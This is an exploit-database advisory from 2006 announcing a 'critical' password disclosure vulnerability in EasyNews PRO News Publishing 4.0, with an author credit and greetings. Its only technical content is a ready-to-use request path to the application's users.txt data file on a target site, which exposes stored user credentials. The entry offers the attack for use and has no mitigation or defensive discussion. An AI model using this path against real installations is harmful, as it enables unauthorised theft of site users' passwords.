id: 1338
date: 12/29/2006
title: EasyNews PRO News Publishing 4.0 Password Disclosure Vulnerability
author: bd0rk
cves: 

==================================================================
EasyNews PRO News Publishing 4.0 Password Disclosure Vulnerability
==================================================================


=> Affected Software: Easy News 4.0 PRO

=> Risk: Critical

=> Bugfounder: bd0rk


=> Greets:   crashovernight, TheJT, Kacper

   Usage: http://[target]/[easy_news_path]/newsboard/data/users.txt



#  0day.today [2023-03-24]  #